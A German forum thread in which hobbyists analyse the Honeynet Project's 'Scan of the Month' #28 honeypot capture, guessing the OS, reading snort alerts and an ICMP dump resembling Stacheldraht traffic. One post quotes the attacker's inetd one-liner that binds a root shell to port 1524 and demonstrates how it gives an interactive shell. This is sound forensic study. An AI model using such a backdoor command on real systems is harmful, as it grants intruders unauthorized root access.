Moin,

kennt jemand die "Scan of the Month" Challenges? Zu finden hier: http://www.honeynet.org/scans/

Ich habe mich mal an der Nr. 28 (Mai) probiert und suche eigentlich nur Leute, um die Ergebnisse zu diskutieren...
Falls irgendjemand von euch Interesse hat...




P.S.: Ich weiß, ist kein Linux-spezifisches Thema, paßt aber wohl trotzdem in dieses Forum, hoffe ich ;)

hallo,

ja die Seiten sind wirklich klasse ...

möchte die Beispiele so in den nächsten Wochen auf alle Fälle mal durchgehen,
denke, das ich so in 14 Tagen damit beginne.

Vielleicht finden sich ja noch ein paar Leute, die sich für das Thema interessieren ;)

grüsse

dann lasst uns doch das Project 28 und deren FRagen durch gehen... schreibt ne PM wann ihr lust und zeit habt damit zu beschäftigen und ...

Yo. Aber warum Privat? Koennte man ja auch hier
besprechen?

Im letzten war doch ein IPv6 IIRC Fan am Start.

man Ethereal :ugly:

da ich die n8 mit meiner snort + mySQL konfiguration nicht wirklich vorran gekommen bin, ein ganze Haribo-tüte vormir lag und VIVA mal zur abwechslung gute Musik spielte,habe ich mir die day1.log angesehen ...

erstmal der link zum scan28: http://www.honeynet.org/scans/scan28/

die 192.168.100.28 gehört dem Gateway des Netzwerkes

Questions

1. What is the operating system of the honeypot? How did you determine that? (see day1)
2. How did the attacker(s) break into the system? (see day1)

Ich denke das es sich hierbei um ein Microsoft Windows System sich handelt.
Aus dem Grund, dass das 305 Packet, den Versuch beinhaltet einen Verbindungsaufbau zu starten.
24.167.44.129 schickt über den PORT 3018 ein SYN-PAcket zu dem 1433 PORT des Gateways.
Dieser bestätigt in form eines ACK und schickt aber dazu noch ein RST Packet,was wieder die
Verbindung abbaut. Und Meines erachtens liegt es an einer Firewall.
Diese Geschichte probiert 24.167.44.129 noch zweimal, mit dem gleichen Ergebnis aus.

Der 1433 Port wird doch für die Ms SQL DATABASE genutzt und daher denke ich das es ein MS-System ist.

Auf der anderen seite, könnte es ein sun oder solaris Kistchen sein,immerhin schaft der Attacker im Packet mit der No. 585 ff einen Bufferoverflow mittels "n/ksh -c echo "ingreslock stream tcp nowait root /bin/sh sh -i">/tmp/x;/usr/sbin/inetd -s /tmp/x;sleep 10;/bin/rm -f /tmp/x" zu erzeugen ....

Erklärung:

Der Zweck dieses Befehls ist, einer interactive shell. Bsp.: # echo "ingreslock stream tcp nowait
root /bin/sh sh -i"> /tmp/x
# /usr/sbin/inetd -s /tmp/x
# telnet localhost 1524
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
#

Warum wird ' SH ' zweimal gezeigt? Es wird zweimal gezeigt, um jederzeit eine interactive shell zu haben Weil, wenn Sie nur einzelnes "SH" spezifizieren (/bin/sh -/i), und der Angreifer sich über den Port verbindet, muß er jedesmal ";" eingeben... :


Using Single "sh" (/bin/sh -i) command
# echo "ingreslock stream tcp nowait root /bin/sh -i"> /tmp/x
# /usr/sbin/inetd -s /tmp/x
# telnet localhost 1524
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
cd /usr/local;
-i: ^M: not found
pwd;
/usr/local
-i: ^M: not found

- As you would notice everytime we issue a command it needs ";" semi-colon.
While if we use double sh (/bin/sh sh -i) if the attacker connect to ingreslock port
it will spawn a interactive shell example below:
# telnet localhost 1524
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
# cd /usr/local
# pwd
/usr/local

so erstmal soweit von mir,ich hoffe wir können darüber reden ... werde erstmal FILM gucken gehen =)

Moin,

das sind ja interessante Theorien ;-)

Ich habe mir bis jetzt den Tag1 mal mit snort (Standardkonfiguration) angeguckt.
Dabei ergibt sich folgendes:

Zuerst finden sich eine Reihe von Scans auf den Server "SCAN Proxy (8080) attemp"

Dann das was ich für den Überlauf halte:



[**] [1:1734:5] FTP USER overflow attempt [**]
[Classification: Attempted Administrator Privilege Gain] [Priority: 1]
11/29-17:43:50.213348 192.168.100.28:32783 -> 62.211.66.16:21
TCP TTL:240 TOS:0x10 ID:0 IpLen:20 DgmLen:209
***AP*** Seq: 0xA6883EB3 Ack: 0xBFBE2DD5 Win: 0xFFFF TcpLen: 20
[Xref => bugtraq 4638]


Bugtraq sagt über die Signatur, daß es sich um einen Überlauf im BlackMoon FTP-Server handelt. Der Server läuft auf Win2000 oder XP. Ich schließe daher auf eins der beiden Betriebssysteme.

Danach kommen diverse ICMP-Pakete, die zu groß sind und daher einen Eintrag auslösen. Ich werde mir die ICMP-Pakete im Laufe des Tages nochmal angucken... Vielleicht läßt sich ja was finden ;)

Aber wie steht's denn mit meiner Überlauf-Theorie? Gibt es gravierende Einwände?

sehr intressantes Thema
sollte hier im forum mehr solche themen geben
werd mich heut abend gleich mal dranhängen

ui das ja ne super sache, mist mist... bin leider im Lern- Klausurenstreß...

aber Anfang Juli mache ich auch gerne mit, hoffe das ganze etabliert sich hier?! :D

mfg

Auch auf die Gefahr hin, total falsch zu liegen, äußere ich mal 'ne kühne Vermutung:

Die ICMP-Pakete sehen lt. tcpdump so aus:


18:03:04.794984 192.168.100.28 > 217.116.38.10: icmp: echo reply (DF) (ttl 255, id 16478, len 1044, bad cksum 87f6!)
0x0000 4500 0414 405e 4000 ff01 87f6 c0a8 641c E...@^@.......d.
0x0010 d974 260a 0000 9ca3 1a0a 0000 0000 0000 .t&.............
0x0020 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0030 736b 696c 6c7a 0000 0000 0000 0000 0000 skillz..........
0x0040 0000 0000 0000 0000 0000 0000 0000 0000 ................
60 Zeilen Nullen gelöscht
0x0410 0000 0000 ....


Obwohl es einige Abweichungen gibt, sieht das (finde ich) ziemlich nach Stacheldraht aus. Die Abweichungen sind:
Keine ICMP-Id 666, außerdem gibt es gewisse Abweichungen in den Hex-Werten des Paketes selbst. Laut meines Papers sollte es mit



4500 0414 010F 0040 01

beginnen. Was es nicht tut. Der String "skillz" ist dann aber wieder typisch.

Hat jemand Ideen?

also hab gestern abend nicht viel zeit gehabt habs aber mal überflogen.

für mich sieht dass bei mssql nur nach einen portscan aus. da ja ein stückchenen weiter unten (359) noch port 8080, 80 und 3128 und jeder port 3 mal immer syn und rst und ack zurück

der gleiche verbindungsaufbau auf den 1433 port erfolgt noch ein paar mal immer gleiches schema

6112 scheint offen zu sein. das einzige mir bekannte auf 6112 ist Battle.net

danach werden mehrere verbindungsversuche auf port 1524 probiert was auch dann gelingt

schaut euch mal zeile 595 und folgende an

bin mir ziemlich sicher dass es sich um ne solaris kiste handelt ich häng mal des file an was ich rausgefiltert hab

am ende wird ein irc bouncer installiert der dann




was sagt ihr ??

genaueres schau ich mir später noch an

hab noch vergessen des file anzuhängen

Kannst du mal kurz schildern, wie du zu der Datei gekommen bist?
Ich muß ja gestehen, ich krieg's nicht so schnell hin. Und dummerweise hab ich im Moment auch weder die Zeit noch die Ruhe, um viel zu Experimentieren...

Ach ja, hab's mit tcpshow probiert. Der sagt aber nur, daß er keine "Nicht-IP"-Protokolle darstellen kann. Ich schätze mal, er meint alles über OSI-Layer 3 ?

Na ja, egal. Laß mal hören!

sorry, hatte viel stress und schaue mir das ganze die n8 oder morgen nochmal an...

soweit bin ihc noch nicht gekommen nur das sieht wie ein gefilterter PAYLOAD aus ...

bei "ethreal" hast du doch eine filteroption das den Payload aus tcp packeten auslesen kann, musst nur bei den richtigen Packeten anfangen diesen filter einzusetzen ...

Hab zwar (leider) nicht genug Ahnung um hier mitreden zu können aber das Thema ist überaus interessant...

cane

Original geschrieben von uTaNG

bei "ethreal" hast du doch eine filteroption das den Payload aus tcp packeten auslesen kann, musst nur bei den richtigen Packeten anfangen diesen filter einzusetzen ...

Hm, das Tool hab ich gar nicht auf der Reihe gehabt, werde ich bei nächster Gelegenheit mal testen...

für die die jetzt zum googlen anfangen des tool heisst ethereal
ziemlich genial so gut wie für jedes os verfügbar !
schaut einfach mal auf www.ethereal.com (http://www.ethereal.com)

Moin,

hab eben gesehen, daß es zu dem Thema 28 jetzt eine offizielle Lösung gibt:

http://www.honeynet.org/scans/scan28/sol/official/index.html

Und ich muß gestehen, daß ich total und völlig daneben gelegen habe mit einen Theorien ;)
Na ja, hab das Papier auch erst überflogen.

Falls Interesse besteht, können wir uns ja auch das Ding von diesem Monat angucken (ist noch nicht online)

Ich kann nur nochmals jedem empfehelen sich diese Musterlösung anzuschauen!

Da lernt man mehr als bei tagelangem Buchstudium!

Werd diese Sachen auf jeden Fall weiterverfolgen...

mfg
cane

und ... wo gehts mit der juni aufgabe weiter? ;)

Den nächsten Scan of the Month gibts erst nächsten Monat

Einen schönen guten Tach!

Ich habe gesehen, daß der nächste SotM leider erst im August rauskommt. Sagt die Website.

Weiß vielleicht jemand von euch Alternativen? Ich muß ja sagen, daß es bis August noch ziemlich lange hin ist...

Nu mach mal kein Stress. :rolleyes: :D

hast Du denn die alten alle schon durchgearbeitet?
Sonst laß doch selber irgendwo nen Sniffer mitlaufen und analysier
das. Besonders gut sind z.B. Unis.

hab mir für die Überbrückung der Zeit schon mal

Know Your Enemy

gekauft. Super Buch kann ich jedem empfehlen

Was gibts darin noch Neues? vs www.honeynet.org

das ist eine zeitschrift, die macht nix anderes, als hackerangriffe und andere digitlalen Kriminalmachenschaften wie Kazaa, usw, welcher art auch immer..., zu erfassen, verwalten, vergleichen... publizieren...???

alle ungelösten fälle werden dann von ner relativ grossen anzahl infi's und hobby-infi's gelöst...?
habich das richtig verstanden?
gruss&danke
pablo

Original geschrieben von linuxhanz
Nu mach mal kein Stress.

Muß ich gar nicht, kommt von alleine ;)



hast Du denn die alten alle schon durchgearbeitet?
Sonst laß doch selber irgendwo nen Sniffer mitlaufen und analysier
das. Besonders gut sind z.B. Unis.

Jo, ich hab gerade die Mitschnitte von den Defcon-Konferenzen am Wickel. Die Leute veröffentlichen unkommentierte Mitschnitte verschiedener Netzwerke.

Wenn es interessiert, google ist dein Freund...

Ist übrigens doch nicht von DefCon sondern von der Shmoo Group veröffentlicht